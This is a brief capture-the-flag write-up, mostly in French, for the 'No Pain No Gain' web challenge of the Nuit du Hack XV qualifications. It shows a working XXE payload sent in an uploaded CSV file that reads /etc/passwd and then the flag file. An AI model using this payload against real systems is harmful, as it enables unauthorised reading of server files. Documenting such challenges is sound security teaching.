/ web

Nuit du Hack XV Qualifications - No Pain No Gain - (WEB 75)

Description

Uploading a CSV file that will be processed to HTML. The purpose of this challenge is to catch the flag file.
Details

Points

75

Category

Web

Url

http://nopainnogain.quals.nuitduhack.com/

Nous avons un site qui upload un fichier CSV afin de le convertir en XML.
La première idée qui vient à l'esprit est alors une xxe.
Il faut que notre CSV respecte le format suivant :
alt

Après quelque recherche il semble que notre DOCTYPE ne passe seulement en étant déclaré à la place du champ <!--Invitations--> On envoie alors le payload suivant :

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
id,name,email
1,&xxe;,user1@user.local
2,user2,user2@user.local

On découvre alors un utilisateur flag
alt

Le flag se retrouve alors dans /home/flag/flag

alt

FLAG : NDH{U3VwZXIgTWFyaW8gQnJvcw0K44K544O844OR44O844Oe44Oq44Kq44OW44Op44K244O844K6DQpTxatwxIEgTWFyaW8gQnVyYXrEgXp1DQrYs9mI2KjYsdmF2KfYsdmK2Yg=}